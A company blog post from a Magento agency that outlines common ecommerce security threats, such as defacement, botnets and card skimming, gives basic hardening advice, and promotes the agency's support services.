How to minimalise security risks and threats with Magento
As with any ecommerce store, security is of utmost importance – both to the merchant and to the customer. Although online transactions are so commonplace now, when security is breached and customer data is compromised it has a lasting impact. In the event of a security attack or malfunction, customer confidence is affected and brand reputation is damaged.
At Space 48, we are Magento experts and our development team have specialist knowledge of the risks involved and the security measures put in place on the Magento platform. We know how important it is to make sure consumer data and payment details are safe.
This blog post sets out to explain the level of security implemented by Magento developers, whilst our technical team impart their knowledge and bring you some key tips and best practices for safeguarding your ecommerce store against hacking attempts and security threats:
How secure is Magento?
Magento is equipped with robust built-in security features, but in a changing digital age with more sophisticated threats developing, there is always more that can be done to make your Magento store bulletproof. Magento 2 has been developed with modularity at its core and with strong ties to open source. This ensures that features can be easily turned off to remove attack vectors and cross pollution of security concerns between features should be reduced, whilst there are many eyes reviewing the code at all times.
The key to the strength of security in Magento 2 is that it has been strongly influenced by the original Magento platform, with the lessons learnt having been carried across. Magento Enterprise is a PCI compliant solution and relevant safeguards and processes have been put in place.
What security risks and threats should businesses be aware of?
As hacking attempts become more sophisticated, there are always going to be risks and threats to ecommerce stores and to platforms such as Magento. However, there are teams dedicated to safeguarding against security threats, minimising risks and resolving issues if security attacks do occur. The key is for businesses to be aware of these risks and threats to help bolster their security and learn the best practices for ecommerce store stability.
Exploiting weaknesses in ecommerce stores and websites of all kinds is nothing new. The scale of the attacks is the thing which becomes increasingly difficult to deal with, as the knowledge of how to perform the exploits becomes disseminated and computing power on large network links becomes cheaper to obtain.
Common types of security attacks
There will always be threats to security, even for the most stringently and bolstered websites and platforms. Here are the main types of security attacks that still threaten ecommerce stores:
The defacing of websites and online stores is often an attack aimed as spreading a particular message, often politically motivated or sometimes just to highlight the poor security of a site or platform. The site access and hosting controls are comprised and the visual appearance of a site can be altered or replaced with. Customer payment details are usually not at risk with an attack of this kind, but user accounts might be compromised.
This kind of security attack is mainly a spam-related issue. Botnetting is a malicious web attack that controls infected computers and sends out spam emails. Although customer data may not be at risk in a botnet attack, your server can be blacklisted by spam filters. The outcome is that your deliverability will be limited.
The threat of an attack on your server is that your website will cease to work properly. This type of attack installs malware, which will affect the functionality of your site and your data will be compromised. It is unlikely that payment details will be at risk, but the reputation of your ecommerce store and trust in your security will be damaged.
Silent card capture
This is severe threat to your store and one which will have a potentially irreparable knock-on effect if allowed to compromise customer payment details. In a silent card capture attack, hackers install hidden malware or card capture software to extract credit card details from consumers. The threat can occur in the checkout stage, as attackers can modify the destination of the payment process meaning payment card details can be obtained from unsecure servers and false pages.
As the name suggests, it can go undetectable for long periods and by the time the threat has been identified, it may have already caused significant damage to customer finances and brand reputation.
“Who you gonna call?” How we help ecommerce stores to be more secure
Space 48 follow best coding practices and have a thorough code review process. One element of this process is to ensure that new security concerns are not introduced. The team undergo regular awareness sessions and training on security and we seek external advice if necessary. Our strong ties to Magento and visibility of numerous live installations ensure we know when to update Magento with new matches and are at the forefront of detecting and resolving new security vulnerabilities.
As a Magento partner and an authority on Magento 2, Space 48 give customers full support on any technical issues related to security. If an ecommerce store is subject to a security breach, we help resolve issues and deal with threats and attacks. Our technical experts provide initial investigation and advice, and in some cases we can resolve the situation ourselves. In more sophisticated and large-scale attempts or breaches we will work with relevant third parties to ensure a safe return to trading.
Here are some further details on our maintenance and support for ecommerce businesses.
Magento security best practices
Here are some key best practices from the Space 48 team to implement to ensure the stability of your ecommerce store’s security:
- Keep Magento up to date
- Consider a Web Application Firewall
- Distributed Denial of Service (DDoS) protection
- Ensure custom code is audited frequently
Services such as Cloudflare can help with WAF and DDoS protection at a reasonable cost.
Key tips for ongoing stability for your Magento store
Keep all software up to date
We advise that you keep all software (including antivirus software) on the server up to date and apply recommended security patches. Always patch or upgrade Magento immediately. Once a security patch is released, it is public and hackers can take advantage – so the clock is ticking. Keep any other software installed on the server updated, including database software. Any weak link within your system can compromise your ecommerce store.
Only install extensions from trusted sources. Review all extensions for security issues before installing them. Magento Marketplace has an array of great extensions to choose from to add to your ecommerce store.
Ensure your operating system is secure
Work with your hosting provider to keep your operating system secure. Make sure that all the software and applications running on the server are secure and necessary. We recommend only using secure communications protocol (SSH/SFTP/HTTPS) to manage your files – disable any FTP.
Work with trustworthy hosts
Ensure that you hosting provider has a secure software development life cycle (SDLC) aligned with industry standards, such as The Open Web Application Security Project (OWASP). We would recommend hosting your site with a Magento hosting partner, as they will have a greater understanding of Magento security.
Secure your Magento Admin area
Check your Magento Admin regularly for unauthorised Admin users and review the Admin Actions Log report for suspicious activity. Hackers can create fake Admin users to give them full access to Magento stores. We would recommend hosting your site with a Magento hosting partner, as they will have a greater understanding of Magento security. Work with your hosting provider to review server logs to detect any suspicious activity and implement an Intrusion Detection System (IDS) onto your network.
Strengthen and periodically change your passwords.
This sounds like an obvious one, but it is so important that you change your passwords on a regular basis and give them ap
Additional tips for monitoring security
Use MageReport to scan your store regularly
We recommend you scan your ecommerce store monthly for malware. Use the highly-regarded MageReport tool, which comes at no additional cost for merchants.
Subscribe to Magento Security Alerts
Magento regularly releases security patches, so it is important to make sure all of these are installed on your store to keep the system up to date. You can stay informed of new patches by subscribing to Magento Security Alerts.
Back everything up
Set up automatic backups for your server and database, so they are regularly backed up. But don’t forget to test the backup success as an added continuity measure.
For more on security best practices for Magento ecommerce stores, check out this detailed resource: Magento security: best practices
We hope this blog has offered you assurances about the stability of Magento and the security measures put in place to minimalise risks and counter the threat of web attacks. Our security tips and best practices should help existing Magento users to better safeguard their ecommerce stores and add another level of protection to their security controls.
Our team of experts offers customers extensive support and advice on the security and maintenance of their ecommerce stores. If you already use the Magento platform for your store and want further security advice or you are considering replatforming your store to Magento or Magento 2, get in touch with our team now, or arrange an audit.